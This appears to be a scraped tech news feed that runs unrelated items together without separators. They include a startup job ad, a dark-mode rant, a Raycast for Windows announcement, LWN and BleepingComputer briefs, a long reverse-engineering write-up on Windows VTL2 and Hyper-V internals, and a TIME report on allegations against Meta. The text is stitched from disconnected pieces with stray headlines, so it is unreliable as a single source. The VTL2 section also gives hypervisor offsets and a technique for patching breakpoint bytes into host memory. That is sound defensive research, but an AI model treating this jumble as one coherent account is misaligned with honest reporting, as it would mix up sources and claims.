Our product is an Agentic IDE built on claude code that helps CTOs and VPEs drive the transition to 99% AI-written code in their engineering orgs. Our MRR grew 100% last month, and we’re bringing on a founding engineer who loves to ship like crazy and get in the weeds with customers to solve big problems in AI Developer Productivity.
You…
Work across the entire stack - frontend apps, backend services, native executables, infrastructure, CI
Have deep experience building in the Typescript ecosystem. We use it across the entire stack - frontend, backend, native executables, infrastructure-as-code.
Ship like an engineer, think like a product owner. You have deep empathy for users and are dedicated to creating a world-class user experience.
Strong in CS fundamentals - operating systems, networking, data structures.
You’re a 99th-percentile Claude Code or Codex user
You know Postgres/MySQL like the back of your hand
Love working with customers to solve their problems. Expect to be forward-deployed to help onboard new customers.
Enjoy hotkeymaxxing - vim, superhuman, RTS games, etc.
Are familiar with auth’n/z - OAuth 2.0, etc.
Are located in SF or willing to relocate (we’ll cover reasonable relocation costs!)
We:
Work 70 hours/week in-person in SF (Marina/Russian Hill)
Are growing rapidly and onboarding design partners. We grew 100% last month and expect to do it again.
Have raised > 3M from YC, Pioneer Fund, and angels including Guillermo Rauch, Paul Klein, and .
Believe you should make it run, make it right, make it fast. Our #1 goal is to deliver value for developers. Refactor
after
patterns emerge
CodeLayer is the best way to get AI to solve hard problems in complex codebases. We help CTOs and VPEs drive the transition to 99% AI-written code in their engineering orgs.
We grew 100% in the last month, we welcomed two YC customers with 50-100 person engineering teams, and we're in paid pilots with several publicly-traded teams with thousands of engineers.
The fetish modern Internet users have with “dark mode” has to stop, as does the rhetoric they typically use to advance their arguments, stuff like:
blasts my eyeballs with full-beam daylight.
or
Every time I open it, I physically recoil like a Victorian child seeing electricity for the first time.
or
My retinas and I would be very grateful
or
the light of a thousand suns
Give me a break. If normal mode bothers you so much, it says one thing:
your ambient lighting is crap
. That will kill your eyesight and no, dark mode won’t save you. Fix your lighting instead of bullying the rest of the Internet into eyesight-damaging practices.
Calculus for Mathematicians, Computer Scientists, and Physicists [pdf]
You know the feeling. Search that can't find your files. Apps buried in menus. Simple tasks that take too many clicks. Your computer should be faster than this. It should feel like everything is at your fingertips. That’s why we built Raycast.
For the past five and a half years, hundreds of thousands of people on Mac have used Raycast daily to cut through the noise. Now, it's time for a new start. We’re excited to announce that
Raycast for Windows is in public beta
. Available today.
Raycast on Windows uses familiar keyboard shortcuts, comes with a design that fits right in, and even lets you search your games alongside your apps. We built it to feel like it belongs here, not like something ported over.
One of the hardest parts was file search. Windows doesn't have a system-wide index that meets our standards, so we built one from scratch. Our custom indexer scans your files in real time and delivers instant results. It’s the kind of search you'd expect from Raycast.
Raycast comes with an extension platform. You can
control your smart home
without opening an app,
translate text
without switching to a browser, search your
Notion
workspace in seconds, manage
GitHub
pull requests, find the perfect
GIF
, or check
Linear
issues. All from one place.
We have thousands of extensions in our ecosystem and hundreds already work on Windows. More are being added every day as developers bring their work to the platform. Simply browse the
Store
, install what you need, and start using it immediately.
Can't find what you're looking for? Build it yourself! Extensions are built with React and TypeScript. So if you know web development, you already know how to build for Raycast. Our
developer documentation
walks you through it. And because our API is designed to be cross-platform, most extensions work on both Mac and Windows out of the box.
During the public beta, Quick AI is free without a subscription. Just launch Raycast with your hotkey, type a question, and hit Tab to get an answer with citations.
Powered by OpenAI's GPT-5 mini, it can handle a variety of tasks from quick lookups to deeper research questions. We want you to experience how natural it feels when AI is just there, ready when you need it. While we don’t support all Pro features on Windows yet, you can optionally
upgrade
to select from more LLMs if you wish.
The public beta includes all the features that make Raycast indispensable. Launch apps instantly, manage windows with keyboard shortcuts, access your Clipboard History, navigate with Quicklinks, expand Snippets as you type, search files across your entire system, and explore lots of extensions.
And this is just the start. We're bringing AI Chat, Notes, and more features to Windows in the coming months. We ship updates regularly, so you'll see the app evolve quickly. The goal is to make Raycast on Windows as powerful as it is on macOS.
Over the past few months, thousands of you have been testing Raycast for Windows and giving us feedback. You've helped us make this better and we couldn't have done this without you. Thanks a lot for your support! As this is a public beta, there will be bugs and issues to work through. So please keep your feedback coming.
Set up Raycast on your PC today and experience what frictionless work feels like.
Ask HN: Good resources to learn financial systems engineering?
I work mainly in energy market communications and systems that facilitate energy trading, balancing and such. Currently most parties there take minutes to process messages and I think there could be a lot to learn from financial systems engineering. Any good resources you can recommend?
Racket 9.0 released
Linux Weekly News
lwn.net
2025-11-23 16:27:46
The Racket programming language
project has released Racket
version 9.0. Racket is a descendant of Scheme, so it is part of the Lisp family of languages. The headline feature in the release is parallel
threads, which adds to the concurrency tools in the language: "While
Racket has had green threads ...
The
Racket programming language
project has
released Racket
version 9.0
. Racket is a descendant of
Scheme
, so it is part of the Lisp family of languages. The headline feature in the release is
parallel
threads
, which adds to the concurrency tools in the language: "
While
Racket has had green threads for some time, and supports parallelism via
futures and places, we feel parallel threads is a major addition.
"
Other new features include the
black-box
wrapper to prevent the compiler from optimizing calculations away, the
decompile-linklet
function to map
linklets
back to an
s-expression
, the
addition of
Weibull
distributions
to the math library, and more.
Improving GCC Buffer Overflow Detection for C Flexible Array Members (Oracle)
Linux Weekly News
lwn.net
2025-11-23 16:08:32
The Oracle blog has a
lengthy article on enhancements to GCC to help detect overflows of
flexible array members (FAMs) in C programs.
We describe here two new GNU extensions which specify size
information for FAMs. These are a new attribute,
"counted_by" and a new builtin function,
"__builtin_...
The Oracle blog has
a
lengthy article
on enhancements to GCC to help detect overflows of
flexible array members (FAMs) in C programs.
We describe here two new GNU extensions which specify size
information for FAMs. These are a new attribute,
"
counted_by
" and a new builtin function,
"
__builtin_counted_by_ref
". Both extensions can be used in
GNU C applications to specify size information for FAMs, improving
the buffer overflow detection for FAMs in general.
The 2025 Linux Foundation Technical Advisory Board election
Linux Weekly News
lwn.net
2025-11-23 15:45:01
The call for
candidates for the 2025 election for the Linux Foundation Technical
Advisory Board has been posted.
The TAB exists to provide advice from the kernel community to the
Linux Foundation and holds a seat on the LF's board of directors;
it also serves to facilitate interactions both wit...
The
call for
candidates
for the 2025 election for the Linux Foundation Technical
Advisory Board has been posted.
The TAB exists to provide advice from the kernel community to the
Linux Foundation and holds a seat on the LF's board of directors;
it also serves to facilitate interactions both within the community
and with outside entities. Over the last year, the TAB has
overseen the organization of the Linux Plumbers Conference, advised
on the setup of the kernel CVE numbering authority, worked behind
the scenes to help resolve a number of contentious community
discussions, worked with the Linux Foundation on community
conference planning, and more.
Nominations close on December 13.
Inmates at a Mississippi jail were ordered to do the guards' bidding
Google enables Pixel-to-iPhone file sharing via Quick Share, AirDrop
Bleeping Computer
www.bleepingcomputer.com
2025-11-23 15:32:46
Google has added interoperability support between Android Quick Share and Apple AirDrop, to let users share files between Pixel devices and iPhones. [...]...
Google has added interoperability support between Android Quick Share and Apple AirDrop, to let users share files between Pixel devices and iPhones.
For now, only Pixel 10-series devices support the new data transmission and reception capability, but more Android models will follow.
Quick Share (formerly Nearby Share) is Android's built-in wireless file-sharing system for sending media, documents, and other files between Android devices over Bluetooth or Wi-Fi Direct.
AirDrop is Apple's equivalent system, which, so far, has only worked for sharing files among iPhones, iPads, and Macs.
Both systems are proprietary and follow different technical approaches, each using its own discovery protocol, authentication flow, and packet formats and parsers.
The lack of a common communication standard between Apple and Google devices restricted users to sharing files with peers in the same ecosystem.
Google announced that this lockdown has been lifted, and people can now share or receive files from or to iOS devices in a secure way.
"As part of our efforts to continue to make cross-platform communication more seamless for users, we've made Quick Share interoperable with AirDrop, allowing for two-way file sharing between Android and iOS devices, starting with the Pixel 10 Family,"
reads the announcement
.
"This new feature makes it possible to quickly share your photos, videos, and files with people you choose to communicate with, without worrying about the kind of phone they use."
The tech giant assures users that the new file-sharing system was built with security at its core, adhering to its strict development safeguards, including threat modeling, internal security and privacy reviews, and internal penetration testing.
An independent audit by NetSPI, a cybersecurity company specializing in penetration testing, attack surface management, and breach simulation,
confirmed
that the new system is robust and that there are no data leakages.
Google's announcement also highlighted that the Rust programming language had a key role in this implementation, to parse wireless data packages while eliminating "entire classes of memory-safety vulnerabilities by design."
The implementation uses AirDrop's "Everyone for 10 minutes" mode for a direct, device-to-device connection that doesn't involve server intermediaries or any point where data logging may occur.
Users are expected to manually verify that the device they see on their screen belongs to the person they want to connect with, so caution is advised at this step to avoid accidentally sharing sensitive content with a random device nearby.
Google notes that this mode is the first step in establishing interoperability, and with Apple's collaboration, they seek to enable a "Contacts Only" mode in future releases.
BleepingComputer has contacted Apple to request a comment on this possibility and how open they are to working towards interoperability with Android, but a response wasn't immediately available.
The Virtual Secure Mode (VSM) mechanism is a data protection and isolation technology in Windows, implemented through virtualization.
In a previous article (In-depth Analysis of the Windows VTL Mechanism & IUM Processes, 深入解析Windows VTL机制 & IUM进程), we introduced the Windows VTL mechanism and the IUM process. Interested readers may revisit that content.
Let’s briefly review the concept of VTL (Virtual Trust Levels). MSDN describes it as follows:
VSM achieves and maintains isolation through Virtual Trust Levels (VTLs). VTLs are enabled and managed on both a per-partition and per-virtual processor basis.
Virtual Trust Levels are hierarchical, with higher levels being more privileged than lower levels. VTL0 is the least privileged level, with VTL1 being more privileged than VTL0, VTL2 being more privileged than VTL1, etc.
Architecturally, up to 16 levels of VTLs are supported; however a hypervisor may choose to implement fewer than 16 VTL’s. Currently, only two VTLs are implemented.
Each VTL has its own set of memory access protections. These access protections are managed by the hypervisor in a partition’s physical address space, and thus cannot be modified by system level software running in the partition.
Since more privileged VTLs can enforce their own memory protections, higher VTLs can effectively protect areas of memory from lower VTLs. In practice, this allows a lower VTL to protect isolated memory regions by securing them with a higher VTL. For example, VTL0 could store a secret in VTL1, at which point only VTL1 could access it. Even if VTL0 is compromised, the secret would be safe.
According to Microsoft documentation, Windows currently supports up to two VTL levels—VTL0 and VTL1. These two levels were analyzed in detail in the earlier article and won’t be repeated here. Higher VTL levels are more secure, and lower VTLs cannot modify (or even access) the data of higher ones.
But reality tells a different story.
In fact, Microsoft has quietly added support for VTL2 and deployed it extensively on its commercial Azure cloud platform.
2. The Disappearing VMSP Process
It all began with an unexpected discovery.
While creating a VM in Azure Local using an Azure Marketplace image, I selected
Security type
as
Trusted Launch virtual machines
, as shown below:
Both images I downloaded from the Azure Marketplace supported the
Trusted Launch
feature.
Once the VM was created, I checked it from the Host. To my surprise, these
Trusted Launch
VMs did not start a VMSP process to support vTPM, as shown below:
There was no VMSP process corresponding to the VMWP process (for those unfamiliar with VMSP, refer to the earlier article. In short, enabling vTPM normally spawns a VMSP process paired with the VMWP process).
At first, I thought
Trusted Launch
VMs simply disabled vTPM by default. But I was wrong. Checking the VM’s security configuration confirmed that TPM was enabled:
And in Device Manager inside the VM, evidence of an active vTPM was present:
As shown, the vTPM MMIO address starting at
0xfed40000
appeared, and the device was working normally.
So the question arose: If vTPM is enabled and functional, then Hyper-V must have some executable or code providing this virtual TPM device. Based on prior Hyper-V research, we know that VMSP contains binaries to support vTPM, with a VMSP process launched at VM startup. But for
Trusted Launch
VMs, this doesn’t happen. There must be another binary (or set of binaries) providing equivalent functionality. The challenge: find where they are, when they load, and under what privileges they serve the VM.
Normally, user-mode virtual devices are initialized through the VMWP process. But in
Trusted Launch
VMs, devices communicating via IO/MMIO virtualization—such as vTPM or power management devices—are not initialized. Let’s take the
PowerManagementDevice
as an example:
Analysis shows: if HCL is enabled, or if
v36
is false, the function returns success to VMWP without actually initializing the device.
Debugging confirmed this: when initializing a
Trusted Launch
VM, calling
vmwp!SecurityManager::IsHclEnabled
returns true (
v35 = 1
). Thus, device initialization code (like vTPM) is never executed by VMWP.
That explains why VMSP never appears. But then, what provides the vTPM functionality? It seems a hidden “ghost” virtual device is quietly serving the VM.
At this point, research hit a roadblock. We knew the effect, but not the cause. Perhaps the
IsHclEnabled
function is the key.
3. OPENHCL and IGVM
Searching for Hyper-V, HCL, and VTL2 led directly to a Microsoft blog: (
OpenHCL: the new, open source paravisor
). This article introduces OPENHCL’s functionality and architecture, including the architecture diagram below:
This diagram clarifies where VTL2 resides and its role. VTL2 runs inside the VM, unlike VTL1, which runs on the Host. For the VM, VTL2 looks like a shadow system running on virtual hardware, resembling a mini-hypervisor—but not nested virtualization. We’ll explore this further later. Importantly, the VM cannot perceive VTL2, and even if VTL1 (securekernel) is fully compromised, it cannot access or modify VTL2 data.
The diagram also shows VTL2 (OPENHCL) having both user mode and kernel mode. In reality, Microsoft’s closed-source VTL2 integrates these into one large kernel binary, similar to securekernel.
Take vTPM as an example: previously, device binaries were loaded by VMWP/VMSP. Now, they are moved into VTL2. Since VTL2 is transparent to the VM, the VM sees no difference between traditional and
Trusted Launch
virtualization. But on the Host side,
Trusted Launch
requires no Host processes to support vTPM.
For example, years ago, I found multiple vTPM vulnerabilities. Suppose one allowed remote code execution. In traditional virtualization, attackers could exploit it to compromise the Host’s VMSP process. With
Trusted Launch
, exploitation only executes code in VTL2—inside the VM boundary. This reduces the attack surface for VM escapes. At worst, it breaks isolation from VTL0 → VTL2, not VM → Host.
Additionally, for confidential computing scenarios (like TPM), VTL2’s isolation guarantees stronger data protection. The VM doesn’t know what it’s communicating with, and even with Ring0 access, it cannot reach VTL2’s physical memory.
OPENVMM, an open-source project, is invaluable for understanding VTL2. But how is VTL2 implemented in real Windows systems?
Through debugging, I identified a key binary:
vmfirmwarehcl.dll
.
As its name suggests, this DLL is tied to Windows’ VTL2 implementation. Opening it in IDA showed no code—it appeared to be a resource container. Checking its resources confirmed this:
Inside was a resource named
VMFW
, whose magic number was
IGVM
. This points us to the
Independent Guest Virtual Machine (IGVM)
file format. IGVM files package everything needed to boot a VM across different stacks, supporting isolation tech like AMD SEV-SNP and Intel TDX. Conceptually, an IGVM is a command set that a loader interprets to build the VM’s initial state.
In Windows VTL2, the IGVM loader extracts and processes the IGVM inside vmfirmwarehcl.dll, writes required data and binaries into the VM’s physical memory, and finalizes the startup.
Microsoft's open-source IGVM project documents the format and includes tools to dump IGVMs for analysis.
Parsing vmfirmwarehcl.dll revealed five IGVMs. Their
IGVM_VHT_SUPPORTED_PLATFORM
fields included:
So, for the IGVM file at the VTL2 level, the
HighestVtl
field should be set to 2, and the
PlatformType
field should be
VSM_ISOLATION
. In this way, the file
13510
is identified.
Inside the
13510
IGVM file, there is a complete PE file:
IGVM_VHT_PAGE_DATA:
GPA: 0000000001A00000
CompatibilityMask: 00000001
FileOffset: 00000000
Flags: 00000000
Reserved: 00000000
Got 4096 bytes of file data:
| 00000000 | 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 | MZ......................@....... |
| 00000020 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F0 00 00 00 | ................................ |
| 00000040 | 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F | ........!..L.!This program canno |
| 00000060 | 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 | t be run in DOS mode....$....... |
| 00000080 | 4E 5F 00 FF 0A 3E 6E AC 0A 3E 6E AC 0A 3E 6E AC EE 4E 6D AD 09 3E 6E AC 78 BF 6D AD 0C 3E 6E AC | N_...>n..>n..>n..Nm..>n.x.m..>n. |
| 000000A0 | 7E BF 6A AD 0E 3E 6E AC 7E BF 6B AD 0B 3E 6E AC 7E BF 6D AD 05 3E 6E AC 7E BF 66 AD CB 3F 6E AC | ~.j..>n.~.k..>n.~.m..>n.~.f..?n. |
| 000000C0 | 7E BF 6E AD 0B 3E 6E AC 7E BF 91 AC 0B 3E 6E AC 7E BF 6C AD 0B 3E 6E AC 52 69 63 68 0A 3E 6E AC | ~.n..>n.~....>n.~.l..>n.Rich.>n. |
| 000000E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 0C 00 67 E9 2F A8 00 00 00 00 | ................PE..d...g./..... |
| 00000100 | 00 00 00 00 F0 00 22 00 0B 02 0E 26 00 40 0D 00 00 10 0F 00 00 10 00 00 E0 4C 0C 00 00 10 00 00 | ......"....&.@...........L...... |
| 00000120 | 00 00 00 00 00 F8 FF FF 00 10 00 00 00 10 00 00 0A 00 00 00 0A 00 00 00 0A 00 00 00 00 00 00 00 | ................................ |
| 00000140 | 00 70 1C 00 00 10 00 00 0A 7D 13 00 01 00 60 41 00 00 08 00 00 00 00 00 00 20 00 00 00 00 00 00 | .p.......}....`A......... ...... |
| 00000160 | 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 10 04 11 00 8E 0C 00 00 | ................................ |
| 00000180 | 00 00 00 00 00 00 00 00 00 40 1C 00 F8 03 00 00 00 30 1B 00 DC 8F 00 00 00 00 00 00 00 00 00 00 | .........@.......0.............. |
...Data omitted...
From the dumped information, we can see that this PE file is written into the Guest's physical memory starting at guest physical address 0x1A00000. This PE file is, in fact, the implementation of the VTL2 layer, and it is written into the virtual machine's physical memory during the VM initialization stage.
By extracting this PE file from the
13510
IGVM file, we obtain the following executable file:
vmhcl.exe
vmhcl.exe
is the implementation of the VTL2 layer on the Windows platform. Moreover, Microsoft provides PDB downloads for
vmhcl.exe
, which reduces the complexity of reverse engineering. Functionally,
vmhcl.exe
is somewhat similar to
securekernel.exe
, as both provide functionality for higher VTL layers. The difference is that
securekernel.exe
serves the VTL1 layer, while
vmhcl.exe
serves the VTL2 layer.
4. VTL2 Architecture and Technical Details
Since VTLs are a virtualization feature, everything here revolves around virtualization, and the natural starting point is the Windows hypervisor layer.
The hypervisor version used in this article is:
10.0.26100.4652
The process of reverse engineering the hypervisor is omitted here. For the current version of the hypervisor, several key member offsets are as follows:
gs:360h ---- partition object
gs:360h + 0x1B0 : partition privilege
gs:360h + 0x1D0 : max vCPU amount
gs:360h + 0x1D4 : max vCPU index
gs:360h + 0x1E0 : virtual processor index 0
gs:360h + 0x1E8 : virtual processor index 1
...
virtual processor + 0x148 : VTL0
virtual processor + 0x150 : VTL1
virtual processor + 0x158 : VTL2
VTL + 0x13E8 : VTL State
VTL State + 0x180 : VMCS VA
VTL State + 0x188 : VMCS PA
Next, we use debugging to observe the behavior of the virtual machine during the transition from VTL0 to VTL2, in order to better understand the practical purpose of the VTL2 level. First, the initial problem to solve is how to trigger code in VTL2 from within the virtual machine. It is known that the vTPM runs at the VTL2 level in
Trusted Launch
type virtual machines, so theoretically, performing TPM-related operations inside the VM should trigger the processing code at the VTL2 level.
Therefore, in theory, running the
Get-Tpm
command inside the virtual machine can be used to trigger code in VTL2.
Once we know how to trigger code in VTL2, the next step is to determine where the hypervisor performs the VTL level switch—specifically, the switch from VTL0 to VTL2. By setting breakpoints during the VTL switch, we can observe the memory state at different VTL levels.
After some work, we identified the function responsible for switching VTLs through reverse engineering:
sub_FFFFF800002B0370 proc near
mov [rsp+arg_8], rbx
mov [rsp+arg_10], rbp
mov [rsp+arg_18], rsi
push rdi
sub rsp, 20h
movzx eax, r8b
mov rbx, rdx
mov rsi, rcx
mov rbp, [rdx+rax*8+148h] ; rax is the VTL level number
mov [rdx+404h], r8b
dec r8b
mov [rdx+3C0h], rbp
cmp r8b, 1
ja short loc_FFFFF800002B03B1
xor al, al
jmp short loc_FFFFF800002B03B7
loc_FFFFF800002B03B1:
mov al, [rdx+0DC0h]
loc_FFFFF800002B03B7:
mov [rdx+406h], al
lea rdi, [rbp+13C0h]
mov [rdx+1010h], rdi
mov rdx, rdi
call sub_FFFFF8000021C8D0 ; finally, the VTL level is switched by this function
...Code Omitted...
You can use a conditional breakpoint here to pause execution when the VTL level number is 2:
From the above debugging process, it can be observed that when the virtual machine's kernel code executes up to tpm!TpmTransportCommandResponse::CheckRequestPttLocalityZero+0xf, the address being read is a mapped MMIO address, so the access triggers a VM-Exit and control is handed over to the hypervisor for handling.
Subsequently, the hypervisor performs a VTL switch. That is, in the debugging process above, at
vmptrld qword ptr [rcx+188h]
, VTL0 is switched to VTL2. After switching to VTL2, by reading the VMCS fields, it is found that the RSP register value of VTL2 at this point is
0x1000023efb8
. Here, the RSP points to the top of the stack of the thread currently running the VP in VTL2, and this location holds the function’s return address.
After a series of address translations, the VTL2 address 0x1000023efb8 is converted to the Host physical address 0x294cd5dfb8. Reading that location with a debugger shows the return address to be 0xfffff800000c504f.
Opening vmhcl.exe in IDA, let’s examine the contents at
0xfffff800000c504f
:
Judging from the function name, it is essentially the main loop function of the VTL2 kernel thread. When the VTL switches to VTL2, the code in VTL2 starts executing from the instruction immediately after
DmVtlReturnAddress
, handling VTL0-level requests to read from MMIO addresses.
According to the information in the IGVM file, the
vmhcl.exe
file will be written into the Guest physical memory at
0x1a00000
. This GPA location is fixed, and the base address of the virtual address mapped in VTL2 is
0xFFFFF80000000000
. The debugging process also confirms this.
To summarize, the architecture of VTL2 is as follows.
5. Debugging Process
Through reverse engineering of
vmhcl.exe
, it was found that
vmhcl.exe
provides a debug functionality. By modifying the debug parameters, one can choose to use serial or network debugging. In theory, it is possible to debug
vmhcl.exe
in a manner similar to debugging the Windows kernel.
However, although vmhcl.exe ships with Microsoft's full debugging facilities, investigation showed that modifying the debug parameters for serial or network debugging does not actually enable debugging of vmhcl.exe. Enabling it requires support from certain hypervisor parameters that ordinary users cannot set through standard methods, and Microsoft has not released official documentation for vmhcl.exe or VTL2. So using the built-in debugging functionality of vmhcl.exe to debug VTL2 is not currently feasible.
So, besides using a hardware debugger or an IDA + VMware dual-machine debugging setup to debug
vmhcl.exe
, are there any other approaches to easily debug
vmhcl.exe
?
Here, the
0xee
injection debugging method will be introduced. Although this method cannot achieve single-step tracing like dual-machine debugging, it is still possible to set breakpoints in
vmhcl.exe
and inspect memory and register states.
First, the principle behind
0xee
injection needs to be explained:
As is well known, a debugger sets a breakpoint at a specific location by inserting
0xcc
into the target position. When the program executes the
0xcc
and is intercepted by the debugger, the debugger restores the original instruction at that location. At this point, the breakpoint is triggered, waiting for user input.
Although it is not possible to insert
0xcc
into VTL2 to implement breakpoints, this idea of inserting a breakpoint can still be borrowed. Two issues need to be solved:
Find an instruction as short as possible (to facilitate restoring after the breakpoint is triggered) that can trigger a
VM-Exit
event, pausing the virtual machine and letting the hypervisor handle it.
Be able to locate this triggered event within the hypervisor.
After searching, one instruction that meets these two conditions is
0xee
.
In x64 assembly,
0xee
means:
out dx, al
, which writes the data from the
al
register to the port stored in the
dx
register. Performing I/O port read/write operations in a virtual machine directly triggers a
VM-Exit
event, pausing the VM and trapping into the hypervisor for handling. This is ideal because the Windows platform allows debugging of the hypervisor. Moreover, the data written via the
al
register can be set as a magic number, such as
0xdead
, making it convenient to locate this event during hypervisor debugging.
Thus, the complete breakpoint instruction is:
0: 66 b8 ad de mov ax,0xdead
4: ee out dx,al
Although it looks a bit clumsy, it is acceptable as a temporary debugging solution.
Next, we will use this method to debug the VTL2 layer’s
vmhcl.exe
as a test. A breakpoint will be set at the
vmhcl!VTpmExecuteCommand
function to examine the stack trace of the VTL2 context.
First, we need to locate the Host physical address of the vmhcl!VTpmExecuteCommand function. According to the disassembly, the function's virtual address is 0xFFFFF8000008200C. As mentioned in the previous section, vmhcl.exe is mapped to the Guest physical address space starting at 0x1a00000. Therefore, the physical address of the vmhcl!VTpmExecuteCommand function in the Guest is 0x1a8200c.
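As a quick sanity check, this Guest physical address follows directly from the fixed mapping described earlier (virtual base 0xFFFFF80000000000, Guest physical base 0x1a00000):

0x1a00000 + (0xFFFFF8000008200C - 0xFFFFF80000000000) = 0x1a00000 + 0x8200C = 0x1a8200C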
After debugging, the physical address of the vmhcl!VTpmExecuteCommand function in the Host is 0x150648200c. Later, we will insert the breakpoint instruction at this physical address.
However, before inserting the breakpoint instruction, we need to set a conditional breakpoint at the hypervisor function that handles the
out dx, al
instruction, as follows:
bp hv+2C3D78".if(@dx==0xdead) {} .else {g;}"
//hv+2C3D78 is the hypervisor function used to handle the out dx, al instruction. Its second parameter, dx, corresponds to the value in the AL register in the virtual machine.
Next, we insert the breakpoint instruction at the beginning of the
vmhcl!VTpmExecuteCommand
function:
!ed 150648200c 0xdeadb866;!eb 150648200c+4 0xee
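These two commands reproduce the breakpoint sequence shown earlier: !ed writes a 4-byte value in little-endian order and !eb writes a single byte, so the bytes at the function entry become:

0xdeadb866 (dword, little-endian) -> 66 B8 AD DE   ; mov ax, 0xdead
0xee       (byte)                 -> EE            ; out dx, al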
Now you can run the
Get-Tpm
command in the virtual machine to trigger VTL2 to execute the
vmhcl!VTpmExecuteCommand
function, and the breakpoint will be successfully hit.
Finally, set the Guest RIP back to the start of the
vmhcl!VTpmExecuteCommand
function so that the hypervisor can continue running and the debugging session ends.
6. Summary
During the initial phase of this VTL2 research, based on Microsoft's VSM documentation, which states that lower VTLs cannot access or modify the data of higher VTLs, I assumed that the VTL2 layer has higher privileges than VTL1. I mapped VTL1 to securekernel.exe on the host and VTL2 to vmhcl.exe in the virtual machine, which misled me into thinking that VTL2 in the virtual machine is more privileged than VTL1 on the host. In reality, the VTL2 layer is never implemented on the host, so such a comparison is meaningless.
In fact, the purpose of VTL2 is to isolate virtual devices, such as vTPM, running in the virtual machine environment. It ensures that while virtual devices operate within the VM, the VM’s operating system cannot modify or access sensitive data. This reduces the host’s attack surface while maintaining a trusted computing environment within the VM. Therefore, assuming a Windows-based VM, the privilege hierarchy within the virtual machine environment is:
VTL2 (vmhcl.exe) > VTL1 (securekernel.exe in the VM) > VTL0 (ntoskrnl.exe in the VM).
Debugging VTL2 feels like dancing in shackles; perhaps we can only hope that Microsoft will eventually publish VTL2 documentation. Nevertheless, for those researching Windows virtualization, the 0xee injection method still serves as a workable stopgap.
Sex trafficking on Meta platforms was both difficult to report and widely tolerated, according to a court filing unsealed Friday. In a plaintiffs’ brief filed as part of a major lawsuit against four social media companies, Instagram’s former head of safety and well-being Vaishnavi Jayakumar testified that when she joined Meta in 2020 she was shocked to learn that the company had a “17x” strike policy for accounts that reportedly engaged in the “trafficking of humans for sex.”
“You could incur 16 violations for prostitution and sexual solicitation, and upon the 17th violation, your account would be suspended,” Jayakumar reportedly testified, adding that “by any measure across the industry, [it was] a very, very high strike threshold.” The plaintiffs claim that this testimony is corroborated by internal company documentation.
The brief, filed by plaintiffs in the Northern District of California, alleges that Meta was aware of serious harms on its platform and engaged in a broad pattern of deceit to downplay risks to young users. According to the brief, Meta was aware that millions of adult strangers were contacting minors on its sites; that its products exacerbated mental health issues in teens; and that content related to eating disorders, suicide, and child sexual abuse was frequently detected, yet rarely removed. According to the brief, the company failed to disclose these harms to the public or to Congress, and refused to implement safety fixes that could have protected young users.
“Meta has designed social media products and platforms that it is aware are addictive to kids, and they’re aware that those addictions lead to a whole host of serious mental health issues,” says Previn Warren, the co-lead attorney for the plaintiffs in the case. “Like tobacco, this is a situation where there are dangerous products that were marketed to kids,” Warren adds. “They did it anyway, because more usage meant more profits for the company.”
The following allegations against Meta come from the brief filed in an unprecedented multidistrict litigation. More than 1,800 plaintiffs—including children and parents, school districts, and state attorneys general—have joined together in a suit alleging that the parent companies behind Instagram, TikTok, Snapchat, and YouTube “relentlessly pursued a strategy of growth at all costs, recklessly ignoring the impact of their products on children’s mental and physical health,” according to their master complaint. The newly unsealed allegations about Meta are just one small part of the sprawling suit. (TIME filed a motion to intervene in the case to ensure public access to court records; the motion was denied.)
The plaintiffs’ brief, first reported by TIME, purports to be based on sworn depositions of current and former Meta executives, internal communications, and company research and presentations obtained during the lawsuit’s discovery process. It includes quotes and excerpts from thousands of pages of testimony and internal company documents. TIME was not able to independently view the underlying testimony or research quoted in the brief, since those documents remain under seal.
But the brief still paints a damning picture of the company’s internal research and deliberations about issues that have long plagued its platforms. Plaintiffs claim that since 2017, Meta has aggressively pursued young users, even as its internal research suggested its social media products could be addictive and dangerous to kids. Meta employees proposed multiple ways to mitigate these harms, according to the brief, but were repeatedly blocked by executives who feared that new safety features would hamper teen engagement or user growth.
“We strongly disagree with these allegations, which rely on cherry-picked quotes and misinformed opinions in an attempt to present a deliberately misleading picture," a Meta spokesperson said in a statement to TIME. "The full record will show that for over a decade, we have listened to parents, researched issues that matter most, and made real changes to protect teens – like introducing Teen Accounts with built-in protections and providing parents with controls to manage their teens’ experiences. We’re proud of the progress we’ve made and we stand by our record.”
In the years since the lawsuit was filed, Meta has implemented new safety features designed to address some of the problems described by plaintiffs. In 2024, Meta unveiled Instagram Teen Accounts, which defaults any user between 13 and 18 into an account that is automatically private, limits sensitive content, turns off notifications at night, and doesn’t allow messaging from unconnected adults. “We know parents are worried about their teens having unsafe or inappropriate experiences online, and that’s why we’ve significantly reimagined the Instagram experience for tens of millions of teens with new Teen Accounts,” a Meta spokeswoman told TIME in June. “These accounts provide teens with built-in protections to automatically limit who’s contacting them and the content they’re seeing, and teens under 16 need a parent’s permission to change those settings. We also give parents oversight over their teens’ use of Instagram, with ways to see who their teens are chatting with and block them from using the app for more than 15 minutes a day, or for certain periods of time, like during school or at night.”
And yet the plaintiffs’ brief suggests that Meta resisted safety changes like these for years.
The brief quotes testimony from Brian Boland, Meta’s former vice president of partnerships who worked at the company for 11 years and resigned in 2020. “My feeling then and my feeling now is that they don’t meaningfully care about user safety,” he allegedly said. “It’s not something that they spend a lot of time on. It’s not something they think about. And I really think they don’t care.”
After the plaintiffs’ brief was unsealed late Friday night, Meta did not immediately respond to TIME’s requests for comment.
Here are some of the most notable allegations from the plaintiffs’ omnibus brief:
Allegation: Meta had a high threshold for "sex trafficking" content—and no way to report child sexual content
Despite Instagram’s “zero tolerance” policy for child sexual abuse material, the platform did not offer users a simple way to report child sexual abuse content, according to the brief. Plaintiffs allege that Jayakumar raised the issue multiple times when she joined Meta in 2020, but was told it would be too difficult to address. Yet Instagram allowed users to easily report far less serious violations, like “spam,” “intellectual property violation” and “promotion of firearms,” according to plaintiffs.
